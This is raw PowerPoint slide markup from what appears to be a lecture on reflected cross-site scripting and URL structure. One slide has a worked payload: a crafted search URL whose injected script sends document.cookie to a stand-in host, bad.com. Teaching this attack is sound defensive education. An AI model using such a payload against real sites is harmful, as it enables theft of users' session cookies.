                <a:lstStyle>
                  <a:lvl1pPr>
                    <a:defRPr sz="2400">
                      <a:solidFill>
                        <a:srgbClr val="1333FF"/>
                      </a:solidFill>
                    </a:defRPr>
                  </a:lvl1pPr>
                </a:lstStyle>
                <a:p>
                  <a:r>
                    <a:t>3</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="890" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4576396" y="5787212"/>
            <a:ext cx="3881100" cy="1769763"/>
            <a:chOff x="-96692" y="-5996"/>
            <a:chExt cx="3881099" cy="1769762"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="885" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-96693" y="245591"/>
              <a:ext cx="3881101" cy="151817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86" name="Echo user input"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1290205">
              <a:off x="665815" y="540899"/>
              <a:ext cx="20081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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="06BC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Echo user input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="889" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="314865" y="-5997"/>
              <a:ext cx="458567" cy="529557"/>
              <a:chOff x="6966" y="19178"/>
              <a:chExt cx="458566" cy="529555"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="887" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="59696" y="107401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8" name="4"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="78566" y="61705"/>
                <a:ext cx="315369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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="895" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2366843" y="6228236"/>
            <a:ext cx="1980439" cy="2074689"/>
            <a:chOff x="0" y="20637"/>
            <a:chExt cx="1980438" cy="2074688"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="891" name="Execute the malicious script as though the…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="495125"/>
              <a:ext cx="1980439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2000"/>
              </a:pPr>
              <a:r>
                <a:t>Execute the</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious script</a:t>
              </a:r>
              <a:br/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as though the</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000"/>
              </a:pPr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server meant us</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000"/>
              </a:pPr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to run it</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="894" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="22781" y="20637"/>
              <a:ext cx="353109" cy="444501"/>
              <a:chOff x="0" y="20637"/>
              <a:chExt cx="353108" cy="444500"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="892" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="66333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3" name="5"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="38365" y="20637"/>
                <a:ext cx="276378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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="901" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4587972" y="3812304"/>
            <a:ext cx="3883643" cy="1279806"/>
            <a:chOff x="-47656" y="67668"/>
            <a:chExt cx="3883642" cy="1279804"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="896" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-47657" y="147114"/>
              <a:ext cx="3883643" cy="1200359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97" name="Steal valuable data"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="627870" y="386130"/>
              <a:ext cx="226288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chemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Steal valuable data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="900" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="242127" y="691311"/>
              <a:ext cx="477570" cy="537511"/>
              <a:chOff x="8994" y="18574"/>
              <a:chExt cx="477568" cy="537510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="898" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="71224" y="110775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9" name="6"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="90094" y="65079"/>
                <a:ext cx="31537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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="907" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2299948">
            <a:off x="4157436" y="6443023"/>
            <a:ext cx="4326783" cy="1468437"/>
            <a:chOff x="-490796" y="15987"/>
            <a:chExt cx="4326782" cy="1468435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="902" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-490797" y="197462"/>
              <a:ext cx="4326783" cy="1286962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903" name="Perform attacker action"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="415971" y="402997"/>
              <a:ext cx="273786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chemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Perform attacker action</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="906" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="40336" y="776725"/>
              <a:ext cx="477569" cy="537511"/>
              <a:chOff x="8994" y="18574"/>
              <a:chExt cx="477568" cy="537510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="904" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="71224" y="110775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5" name="6"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="90094" y="65079"/>
                <a:ext cx="31537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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="913" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4588180" y="2895398"/>
            <a:ext cx="3850935" cy="1184024"/>
            <a:chOff x="82467" y="-28229"/>
            <a:chExt cx="3850933" cy="1184023"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="908" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="82467" y="-28230"/>
              <a:ext cx="3850935" cy="118402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909" name="Visit web site"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="642696" y="339564"/>
              <a:ext cx="1566165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rgbClr val="010000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Visit web site</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="912" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="239152" y="515346"/>
              <a:ext cx="441263" cy="517536"/>
              <a:chOff x="1450" y="19726"/>
              <a:chExt cx="441262" cy="517534"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="910" name="1"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="64397" y="56244"/>
                <a:ext cx="315369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911" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="45527" y="101940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19" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4581466" y="3161755"/>
            <a:ext cx="3870152" cy="1424378"/>
            <a:chOff x="-44960" y="81569"/>
            <a:chExt cx="3870150" cy="1424376"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="914" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-44961" y="309297"/>
              <a:ext cx="3870152" cy="119664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915" name="Receive malicious page"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="560400" y="479465"/>
              <a:ext cx="2813305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rgbClr val="010000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Receive malicious page</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="918" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="195654" y="863962"/>
              <a:ext cx="441264" cy="517536"/>
              <a:chOff x="1450" y="19726"/>
              <a:chExt cx="441262" cy="517534"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="916" name="2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="64397" y="56244"/>
                <a:ext cx="315369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917" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="45527" y="101940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22" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6883313" y="4860712"/>
            <a:ext cx="4976707" cy="1265848"/>
            <a:chOff x="0" y="-111124"/>
            <a:chExt cx="4976705" cy="1265847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="920" name="URL specially crafted by the attacker"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="736480" y="-111125"/>
              <a:ext cx="4240226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3400">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>URL specially crafted</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>by the attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="923" name="Connection Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="443441"/>
              <a:ext cx="919128" cy="71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3" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="974" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-2547" y="7892"/>
                    <a:pt x="3479" y="692"/>
                    <a:pt x="19053" y="0"/>
                  </a:cubicBez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" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="884" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="890" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="895" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="901" grpId="9" animBg="1" advAuto="0"/>
      <p:bldP spid="907" grpId="8" animBg="1" advAuto="0"/>
      <p:bldP spid="913" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="919" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="922" grpId="5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Echoed in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Echoed input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response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11099800" cy="2352165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="927" name="http://victim.com/search.php?term=socks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2889622" y="5637926"/>
            <a:ext cx="7225556" cy="4476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http://victim.com/search.php?term=socks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="928" name="&lt;html&gt; &lt;title&gt; Search results &lt;/title&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994732" y="7221676"/>
            <a:ext cx="7216032" cy="19304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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt; &lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search results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&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="24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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C84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Results for</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socks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 algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="02000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 . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="24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&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Input from bad.com:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4494123" y="5098118"/>
            <a:ext cx="40165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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Input from bad.com:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Result from victim.com:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4206328" y="6503392"/>
            <a:ext cx="459214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Result from victim.com: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" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="928" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="929" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="930" grpId="3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Exploiting echoed in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Exploiting echoed input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="933" name="http://victim.com/search.php?term=    &lt;script&gt; window.open(…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346896" y="3103152"/>
            <a:ext cx="6426480" cy="19208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http://victim.com/search.php?term=</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; window.open(</a:t>
            </a:r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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     “</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bad.com/steal?c=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     + document.cookie)</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934" name="&lt;html&gt; &lt;title&gt; Search results &lt;/title&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005351" y="6207613"/>
            <a:ext cx="7235082" cy="19304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4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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt; &lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search results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&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="24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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C84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Results for</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="02000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 . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="24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&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="935" name="Browser would execute this within victim.com’s origin"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899368" y="8810493"/>
            <a:ext cx="1120606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Browser would execute this within </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:t>’s origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="936" name="Input from bad.com:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4494123" y="2453604"/>
            <a:ext cx="40165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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Input from bad.com:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Result from victim.com:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326820" y="5523679"/>
            <a:ext cx="459214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Result from victim.com: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" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="934" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="935" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="936" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="937" grpId="3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Reflected XSS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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Reflected XSS Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="940" name="Target: User with Javascript-enabled browser; vulnerable web service that includes parts of URLs it receives in the output it generat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Target</a:t>
            </a:r>
            <a:r>
              <a:t>: User with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Javascript-enabled browser</a:t>
            </a:r>
            <a:r>
              <a:t>; vulnerable web service that includes parts of URLs it receives in the output it generates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 goal</a:t>
            </a:r>
            <a:r>
              <a:t>: Run script in user’s browser with same access as provided to server’s regular scripts (subvert SOP)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Attacker needs</a:t>
            </a:r>
            <a:r>
              <a:t>: Get user to click on specially-crafted URL. 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Optional: A server for receiving stolen user information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Key trick</a:t>
            </a:r>
            <a:r>
              <a:t>: Server does not ensure its output does not contain foreign, embedded scripts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Interacting with web serv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Interacting with web servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Resources which are identified by a URL…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2222810" y="2443524"/>
            <a:ext cx="855918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Resources</a:t>
            </a:r>
            <a:r>
              <a:t> which are identified by a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>(Universal Resource Locator)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="463" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4488550" y="3908236"/>
            <a:ext cx="3856398" cy="1188446"/>
            <a:chOff x="-1861743" y="-1518730"/>
            <a:chExt cx="3856397" cy="1188444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="461" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-711992" y="-863631"/>
              <a:ext cx="2703993" cy="533345"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 14758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2" name="Path to a resource"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1861744" y="-1518731"/>
              <a:ext cx="3856399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Path to a resource</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="http://facebook.com/delete.php"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498193" y="4519052"/>
            <a:ext cx="786256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http://facebook.com/delete.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Here, the file delete.php is dynamic content…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619246" y="6711373"/>
            <a:ext cx="9128192" cy="1124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3400"/>
            </a:pPr>
            <a:r>
              <a:t>Here, the file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delete.php</a:t>
            </a:r>
            <a:r>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>i.e., the server generates the content on the fly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="?f=joe123&amp;w=16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249346" y="4519052"/>
            <a:ext cx="371661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?f=joe123&amp;w=16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="469" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8560775" y="4576178"/>
            <a:ext cx="3497149" cy="1158976"/>
            <a:chOff x="-1094098" y="-863630"/>
            <a:chExt cx="3497148" cy="1158975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="467" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1094099" y="-863631"/>
              <a:ext cx="3497150" cy="533345"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 14758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8" name="Arguments"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-809036" y="-301555"/>
              <a:ext cx="2368079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Arguments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5303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65" grpId="0" animBg="1" advAuto="0"/>
